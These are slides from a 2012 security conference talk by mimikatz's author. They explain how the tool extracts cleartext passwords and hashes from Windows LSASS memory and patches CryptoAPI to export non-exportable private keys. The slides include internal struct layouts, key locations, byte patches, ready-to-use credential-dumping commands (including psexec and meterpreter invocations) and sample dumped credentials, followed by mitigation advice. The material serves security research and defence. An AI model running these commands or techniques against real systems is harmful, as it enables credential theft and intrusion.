mimikatz @ asfws
DESCRIPTION
mimikatz @ asfws - http://blog.gentilkiwi.com/mimikatz Focus on sekurlsa / pass-the-pass & keys export with CryptoAPI / CNGTRANSCRIPT
mimikatz
Benjamin DELPY `gentilkiwi`focus on sekurlsa/pass-the-pass
and crypto patches
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 2
Who ? Why ?
Benjamin DELPY `gentilkiwi`– French– 26y– Kiwi addict– Lazy programmer
Started to code mimikatz to :– explain security concepts ;– improve my knowledge ;– prove to Microsoft that sometimes they must change old habits.
Why all in French ?– because I’m – It limits script kiddies usage– Hack with class
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 3
mimikatzworking
On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8– x86 & x64– 2000 support dropped with mimikatz 1.0
Everywhere ; it’s statically compiled
Two modes– direct action (local commands) – process or driver communication
07/11/2012
sekurlsa.dll
mimikatz.exe
KeyIso« Isolation de clé CNG »
LSASS.EXE
Direct action :crypto::patchcng
EventLog« Journal d’événements Windows »
SVCHOST.EXE
Direct action :divers::eventdrop
mimikatz.exe
SamSS« Gestionnaire de comptes de sécurité »
LSASS.EXE
VirtualAllocEx, WriteProcessMemory, CreateRemoteThread...
Open a pipeWrite a welcome messageWait commands… and return results
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 4
mimikatzarchitecture of sekurlsa & crypto
07/11/2012
mimikatz.exe
mod_mimikatz_sekurlsa
mod_mimikatz_nogpo
mod_mimikatz_divers
mod_mimikatz_winmine
mod_mimikatz_impersonate
mod_mimikatz_inject
mod_mimikatz_samdump
mod_mimikatz_standard
mod_mimikatz_crypto
mod_mimikatz_handle
mod_mimikatz_system
mod_mimikatz_service
mod_mimikatz_process
mod_mimikatz_thread
mod_mimikatz_terminalserver
mod_mimikatz_privilege
mod_pipe
mod_inject
mod_memory
mod_parseur
mod_patch
mod_hive
mod_secacl
mod_privilege
mod_process
mod_service
mod_system
mod_thread
mod_ts
mod_text
mod_crypto
mod_cryptoapi
mod_cryptoacng
msv_1_0
tspkg
wdigest
livessp
kerberos
kappfree.dll
kelloworld.dll
klock.dll
mimikatz.sys
sekurlsa.dll
sam
secrets
msv_1_0
wdigest
livessp
kerberos
tspkg
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 5
mimikatz :: sekurlsawhat is it ?
A module replacement for my previous favorite library !
A local module that can read data from the SamSS Service (well known LSASS process)
What sekurlsa module can dump :– MSV1_0 hashes– TsPkg passwords– Wdigest passwords– LiveSSP passwords– Kerberos passwords (!)– …?
07/11/2012
mod_mimikatz_sekurlsa
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 6
mimikatz :: sekurlsahow LSA works ( level)
07/11/2012
LsaSSWinLogon
Authentication Packagesmsv1_0
tspkg
wdigest
livessp
kerberos
Authentication
msv1_0
kerberos
SAM
ChallengeResponse
user:domain:password
PLAYSKOOL
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 7
mimikatz :: sekurlsahow LSA works ( level)
Authentication packages :– take user’s credentials from the logon– make their own stuff– keep enough data in memory to compute responses of
challenges (Single Sign On)
If we can get data, and inject it in another session of LSASS, we avoid authentication part
This is the principle of « Pass-the-hash »– In fact, of « Pass-the-x »
07/11/2012
PLAYSKOOL
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 8
mimikatz :: sekurlsahistory of « pass-the-* » 1/2
Pass-the-hash– 1997 - Unix modified SAMBA client for Hashes usage ; Paul Ashton (EIGEN)– 2000 - Private version of a Windows « LSA Logon Session Editor » ; Hernan
Ochoa (CoreSecurity)– 2007 - TechEd @ Microsoft ; Marc Murray (TrueSec) present msvctl, and
provide some downloads of it – 2007 - « Pass the hash toolkit » published ; Hernan Ochoa (CoreSecurity)– 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86
& x64 versions of Windows (yeah, by myself but in French; so not famous ;))
2007 was the year of pass the hash !
Pass-the-ticket– 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support; Hernan Ochoa (Ampliasecurity)
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 9
mimikatz :: sekurlsahistory of « pass-the-* » 2/2
Pass-the-pass– 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3)• http://blog.gentilkiwi.com/securite/pass-the-pass
– 05/2011 – return of mimikatz ; it dumps clear text passwords from WDigest provider (unlimited this time ;))
• http://blog.gentilkiwi.com/securite/re-pass-the-pass
– 05/2011 – Some organizations opened cases to Microsoft about it…
…Lots of time…
– begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say few words about mimikatz– 03/2012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password
extract…• http://seclists.org/pen-test/2012/Mar/7
– 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
• http://blog.gentilkiwi.com/securite/rere-pass-the-pass
– 03/2012 – yeah, once again…, more curious but Kerberos keeps passwords in memory• http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
– 08/2012 – sekurlsa module without injection at all ! (ultra safe)• http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 10
mimikatz :: sekurlsa :: tspkg
because sometimes hash is not enough…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 11
mimikatz :: sekurlsa :: tspkgwhat is it ?
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop users’s experience– http://technet.microsoft.com/library/cc772108.aspx
Rely on CredSSP with Credentials Delegation (!= Account delegation)– Specs :
http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression : it seems cool – User does not have to type its password– Password is not in RDP file– Password is not in user secrets07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 12
mimikatz :: sekurlsa :: tspkgquestions ?
KB says that for it works, we must enable « Default credentials » delegation– “Default credentials : The credentials obtained when the user first logs on to
Windows” - https://msdn.microsoft.com/library/bb204773.aspx
• What ? Our User/Domain/{Password | Hash | Ticket} ? It seems …– In all cases, system seems to be vulnerable to pass-the-*…
In what form ?Our specs : [MS-CSSP]– 2.2.1.2.1 TSPasswordCreds
• The TSPasswordCreds structure contains the user's password credentials that are delegated to the server. (or PIN)
TSPasswordCreds ::= SEQUENCE { domainName [0] OCTET STRING, userName [1] OCTET STRING, password [2] OCTET STRING
}
– Challenge / response for authentication ?• Serveur : YES (TLS / Kerberos)• Client : NO ; *password* is sent to server…
So password resides somewhere in memory ?07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 13
mimikatz :: sekurlsa :: tspkgsymbols & theory
Let’s explore some symbols !
– sounds cool… (thanks Microsoft)
Let’s imagine a scenario– Enumerate all sessions to obtain :
• Username• Domain• LUID
– Call tspkg!TSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain :
• TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for :
• TS_PRIMARY_CREDENTIAL with clear text credentials…
07/11/2012
kd> x tspkg!*clear*75016d1c tspkg!TSObtainClearCreds = <no type information>kd> x tspkg!*password*75011b68 tspkg!TSDuplicatePassword = <no type information>75011cd4 tspkg!TSHidePassword = <no type information>750195ee tspkg!TSRevealPassword = <no type information>75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>kd> x tspkg!*locate*7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 14
mimikatz :: sekurlsa :: tspkgworkflow
07/11/2012
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {PVOID unk0;LSA_UNICODE_STRING Domaine;LSA_UNICODE_STRING UserName;LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;
LsaEnumerateLogonSessions
for each LUID
password in clear !
tspkg!TSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL {#ifdef _M_X64 BYTE unk0[108];#elif defined _M_IX86 BYTE unk0[64];#endif LUID LocallyUniqueIdentifier; PVOID unk1; PVOID unk2; PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
KIWI_TS_CREDENTIAL
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 15
mimikatz :: sekurlsa :: tspkgdemo time !
sekurlsa::tspkg
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 16
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 17
mimikatz :: sekurlsa :: wdigestwhat is it ?
“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]”Wikipedia : http://en.wikipedia.org/wiki/Digest_access_authentication
“Common Digest Authentication Scenarios :– Authenticated client access to a Web site– Authenticated client access using SASL– Authenticated client access with integrity protection to a directory service using
LDAP”Microsoft : http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool – No password over the network, just hashes– No reversible password in Active Directory ; hashes for each realm
• Only with Advanced Digest authentication
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 18
mimikatz :: sekurlsa :: wdigestwhat is it ?
We speak about hashes, but what hashes ?H = MD5(HA1:nonce:[…]:HA2)
• HA1 = MD5(username:realm:password)• HA2 = MD5(method:digestURI:[…])
Even after login, HA1 may change… realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers :– Username– Realm (from server)– Password
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 19
mimikatz :: sekurlsa :: wdigesttheory
This time, we know :– that WDigest keeps password in memory « by protocol » for HA1 digest– that LSASS love to unprotect password with LsaUnprotectMemory (so protect with
LsaProtectMemory)
LsaUnprotectMemory– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE– Let’s perform a research in WDigest :
– Hypothesis seems verified
LsaProtectMemory– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE– Let’s perform a research in WDigest :
– SpAcceptCredentials takes clear password in args• Protect it with LsaProtectMemory• Update or insert data in double linked list : wdigest!l_LogSessList
07/11/2012
.text:7409D151 _DigestCalcHA1@8 call dword ptr [eax+0B4h]
.text:74096C69 _SpAcceptCredentials@16 call dword ptr [eax+0B0h]
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 20
mimikatz :: sekurlsa :: wdigestworkflow
07/11/2012
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY {struct _KIWI_WDIGEST_LIST_ENTRY *Flink;struct _KIWI_WDIGEST_LIST_ENTRY *Blink;DWORD UsageCount;struct _KIWI_WDIGEST_LIST_ENTRY *This;LUID LocallyUniqueIdentifier;[…]LSA_UNICODE_STRING UserName;LSA_UNICODE_STRING Domaine;LSA_UNICODE_STRING Password;[…]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
wdigest!l_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear !
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 21
mimikatz :: sekurlsa :: wdigestdemo time !
sekurlsa::wdigest
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 22
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 23
mimikatz :: sekurlsa :: livessphow
Actually I’ve only used logical (empirical) approach to search passwords… :– Protocol reading– Symbols searching
~ Boring ~… be more brutal this time : make a WinDBG trap !
07/11/2012
0: kd> !process 0 0 lsass.exePROCESS 83569040 SessionId: 0 Cid: 0224 Peb: 7f43f000 ParentCid: 01b4 DirBase: 5df58100 ObjectTable: 80ce4740 HandleCount: <Data Not Accessible> Image: lsass.exe
0: kd> .process /i 83569040You need to continue execution (press 'g' <enter>) for the contextto be switched. When the debugger breaks in again, you will be inthe new process context.0: kd> gBreak instruction exception - code 80000003 (first chance)nt!RtlpBreakWithStatusInstruction:814b39d0 cc int 30: kd> .reload /userLoading User Symbols............................................................0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5 ; g"0: kd> g
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 24
mimikatz :: sekurlsa :: livessphow
Let’s login with a Live account on Windows 8 !
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07/11/2012
lsasrv!LsaProtectMemorylivessp!LiveMakeSupplementalCredlivessp!LiveMakeSecPkgCredentialslivessp!LsaApLogonUserEx2livessp!SpiLogonUserEx2
lsasrv!LsaProtectMemorymsv1_0!NlpAddPrimaryCredentialmsv1_0!SspAcceptCredentialsmsv1_0!SpAcceptCredentials
lsasrv!LsaProtectMemorytspkg!TSHidePasswordtspkg!SpAcceptCredentials
1: kd> uf /c livessp!LsaApLogonUserEx2livessp!LsaApLogonUserEx2 (74781536)[...] livessp!LsaApLogonUserEx2+0x560 (74781a96): call to livessp!LiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah, Pass the Hash capability with Live account too…
Live user can logon through RDP via SSO
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 25
mimikatz :: sekurlsa :: livesspworkflow
07/11/2012
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear !
typedef struct _KIWI_LIVESSP_LIST_ENTRY {struct _KIWI_LIVESSP_LIST_ENTRY *Flink;struct _KIWI_LIVESSP_LIST_ENTRY *Blink;PVOID unk0;PVOID unk1;PVOID unk2;PVOID unk3;DWORD unk4;DWORD unk5;PVOID unk6;LUID LocallyUniqueIdentifier;LSA_UNICODE_STRING UserName;PVOID unk7;PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
livessp!LiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
DWORD isSupp;DWORD unk0;LSA_UNICODE_STRING UserName;LSA_UNICODE_STRING Domaine;LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 26
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap ?*
07/11/2012
* Me, yes
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 27
mimikatz :: sekurlsa :: kerberos
Let’s login normal account
After credentials protection, KerbCreateLogonSession calls :– NT6 ; KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
– NT5 ; KerbInsertLogonSession to insert data in KerbLogonSessionList07/11/2012
lsasrv!LsaProtectMemorykerberos!KerbHideKeykerberos!KerbCreatePrimaryCredentialskerberos!KerbCreateLogonSessionkerberos!SpAcceptCredentials
lsasrv!LsaProtectMemorykerberos!KerbHidePasswordkerberos!KerbCreateLogonSessionkerberos!SpAcceptCredentials
lsasrv!LsaProtectMemorymsv1_0!NlpAddPrimaryCredentialmsv1_0!SspAcceptCredentialsmsv1_0!SpAcceptCredentials
lsasrv!LsaProtectMemorywdigest!SpAcceptCredentials
lsasrv!LsaProtectMemorytspkg!TSHidePasswordtspkg!SpAcceptCredentials
Kerberos part for password ??????
Kerberos, ticket part ? Maybe ;)
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 28
mimikatz :: sekurlsa :: kerberos (nt6)workflow
07/11/2012
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDEN
TIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL{
DWORD unk0;PVOID unk1;PVOID unk2;PVOID unk3;
#ifdef _M_X64BYTE unk4[32];
#elif defined _M_IX86BYTE unk4[20];
#endifLUID LocallyUniqueIdentifier;
#ifdef _M_X64BYTE unk5[44];
#elif defined _M_IX86BYTE unk5[36];
#endifLSA_UNICODE_STRING UserName;LSA_UNICODE_STRING Domaine;LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
LsaEnumerateLogonSessions
for each LUID
password in clear !
KIWI_KERBEROS_PRIMARY_CREDEN
TIAL
Kerberos!KerbGlobalLogonSessionTable
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 29
mimikatz :: sekurlsa :: kerberos (nt5)workflow
07/11/2012
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear !
typedef struct _KIWI_KERBEROS_LOGON_SESSION {struct _KIWI_KERBEROS_LOGON_SESSION *Flink;struct _KIWI_KERBEROS_LOGON_SESSION *Blink; DWORD UsageCount;PVOID unk0;PVOID unk1;PVOID unk2;DWORD unk3;DWORD unk4;PVOID unk5;PVOID unk6;PVOID unk7;LUID LocallyUniqueIdentifier;
#ifdef _M_IX86DWORD unk8;
#endifDWORD unk9;DWORD unk10;PVOID unk11;DWORD unk12;DWORD unk13;PVOID unk14;PVOID unk15;PVOID unk16;[…]LSA_UNICODE_STRING UserName;LSA_UNICODE_STRING Domaine;LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
kerberos!KerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 30
mimikatz :: sekurlsademo time !
Final sekurlsa demo sekurlsa::logonPasswords full
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 31
mimikatz :: sekurlsa :: kerberos“hu ?”
Ok It works…*But why ?* Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations– no need of passwords for the Kerberos protocol… – all is based on the hash (not very sexy too)
Microsoft’s implementation of Kerberos is full of logical…– For password auth :
• password hash for shared secret, but keeping password in memory– For full smartcard auth :
• No password on client• No hash on client ?
– NTLM hash on client…– KDC sent it back as a gift
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 32
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way to be used
We used LsaUnprotecMemory, in the LSASS context, to decrypt them
– This function rely on LsaEncryptMemory from lsasrv.dll
For that, we previously inject a DLL (sekurlsa.dll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ?– Yes, it is… no more injection, just reading memory of LSASS process…
mimikatz can use lsasrv.dll too and “imports” LSASS initialized keys – When we call LsaEncryptMemory in mimikatz, with all keys imported from LSASS, we
have the same comportments than when we are in LSASS !
07/11/2012
LsaUnprotectMemory
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 33
mimikatz :: sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory use :– RC4
– DESx
07/11/2012
g_pRandomKey
g_cbRandomKey
@BYTE[g_cbRandomKey]
DWORD ; 256
BYTE[g_cbRandomKey]
g_pDESXKey @BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copy…
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 34
mimikatz :: sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory use :
– 3DES
– AES
07/11/2012
InitializationVector
BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copy…
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA { DWORD size; DWORD tag; DWORD type; DWORD unk0; DWORD unk1; DWORD unk2; DWORD unk3; PVOID unk4; BYTE data; /* etc... */} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;
hAesKey
lsasrv
typedef struct _KIWI_BCRYPT_KEY { DWORD size; DWORD type; PVOID unk0; PKIWI_BCRYPT_KEY_DATA cle; PVOID unk1;} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 35
mimikatz :: sekurlsamemo
Security Packages
Protection Keys
07/11/2012
Package Symbols Typetspkg tspkg!TSGlobalCredTable RTL_AVL_TABLE
wdigest wdigest!l_LogSessList LIST_ENTRY
livessp livessp!LiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberos!KerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberos!KerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrv!LogonSessionListlsasrv!LogonSessionListCount
LIST_ENTRYULONG
Key NT 5 SymbolsRC4 lsasrv!g_cbRandomKey
lsasrv!g_pRandomKey
DESx lsasrv!g_pDESXKeylsasrv!g_Feedback
Key NT 6 Symbolslsasrv!InitializationVector
3DES lsasrv!h3DesKey
AES lsasrv!hAesKey
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 36
mimikatz :: sekurlsamemo
Some commands : mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
07/11/2012
mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */// http://blog.gentilkiwi.com/mimikatz mimikatz # privilege::debugDemande d'ACTIVATION du privilège : SeDebugPrivilege : OK mimikatz # sekurlsa::logonPasswords full Authentification Id : 0;234870Package d'authentification : NTLMUtilisateur principal : Gentil KiwiDomaine d'authentification : vm-w8-rp-x msv1_0 : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Hash LM : d0e9aee149655a6075e4540af1f22d3b * Hash NTLM : cc36cf7a8514893efccd332446158b1a kerberos : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ wdigest : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ tspkg : * Utilisateur : Gentil Kiwi * Domaine : vm-w8-rp-x * Mot de passe : waza1234/ livessp : n.t. (LUID KO)
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 37
mimikatz :: sekurlsawhat we can do ?
Basics– No physical access to computer (first step to pass the hash, then pass the pass)– No admin rights / system rights / debug privileges (…)– Disable local admin accounts– Strong passwords (haha, it was a joke ; so useless !!!)– For privileged account, network login instead of interactive (when possible)– Audit ; pass the hash keeps traces and can lock accounts– No admin rights / system rights / debug privileges, even VIP– Use separated network (or forest) for privileged tasks
More in depth– Force strong authentication (SmartCard & Token) : $ / €– Short validity for Kerberos tickets– No delegation– Disable NTLM (available with NT6)– No exotic :
• biometrics (it keeps password somewhere and push it to Windows)• single sign on
– Stop shared secrets for authentication : push Public / Private stuff (like keys ;))– Let opportunities to stop retro compatibility– Disable faulty providers ?
• Is it supported by Microsoft ?• Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0 ?
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 38
mimikatz :: cryptowhat is it ?
A little module that I wrote to :– play with Windows Cryptographic API / CNG and RSA keys– automate export of certificates/keys
• Even those which are “not” exportable
What crypto module can do :– List
• Providers• Stores• Certificates• Keys
– Export• Certificates
– public in DER format– with private keys in PFX format
• Private keys in PVK format – it’s cool, OpenSSL can deal with it too
– Patch• CryptoAPI in mimikatz context• CNG in LSASS context (again !)
07/11/2012
mod_mimikatz_crypto
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 39
mimikatz :: cryptohow it’s protected
Private keys are DPAPI protected– You cannot reuse private key files on another computer
• At least without the master keys and/or password of users
Computer/User can load their own keys because they have enough secrets to do it (ex : session opened)– Yes, a computer/server open a “session”
Export/Usage can be limited by :– Password– Popup– Export/Archive flag no present
07/11/2012
Constraint for most userUnavailable for computer keys
certutil -importpfx mycert.p12 NoExportcertutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 40
mimikatz :: crypto :: capihow it works
“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardware.”
– http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory , Internet Explorer, yourappshere…) load some DLL to deal with different cryptographic stuff : CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Process deal with cryptographic keys by this API…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 41
mimikatz :: crypto :: capihow it’s exported ( level)
07/11/2012
Process
CryptoAPI and RSA CSP
Exportable ?Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 42
mimikatz :: crypto :: patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey
This function do all the work to prepare the export, and check if the key is exportable
07/11/2012
mimikatz # crypto::exportCertificatesEmplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My - Benjamin Delpy Container Clé : {470ADFBA-8718-4014-B05E-B30776B75A03} Provider : Microsoft Enhanced Cryptographic Provider v1.0 Type : AT_KEYEXCHANGE Exportabilité : NON Taille clé : 2048 Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié. Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK
================ Certificat 0 ================Numéro de série : 112169417a1c3ef46a301f99385f50680fa0Émetteur: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BEObjet: CN=Benjamin Delpy, C=FRIl ne s'agit pas d'un certificat racineHach. cert. (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de clé = {470ADFBA-8718-4014-B05E-B30776B75A03} Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0La clé privée NE PEUT PAS être exportéeSuccès du test de cryptageCertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
Exportable ?
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 43
mimikatz :: crypto :: patchcapibecause I own my process
So what ? A module in my own process return that I can’t do something ?CryptoAPI is in my memory space, let’s patch it !
I wrote “4” bytes in my memory space
07/11/2012
.text:0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
.text:0AC0B7CB 90 nop
.text:0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
.text:0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90 nop
.text:0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 44
mimikatz :: crypto :: patchcapidemo time !
Import, export, import as not exportable…. export
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - [email protected] ; blog.gentilkiwi.com 45
mimikatz :: crypto :: patchcapilimitations
Because :– I’m lazy– I’ve seen in majority of case RSA keys for real life use
• Elliptic Curve a little…
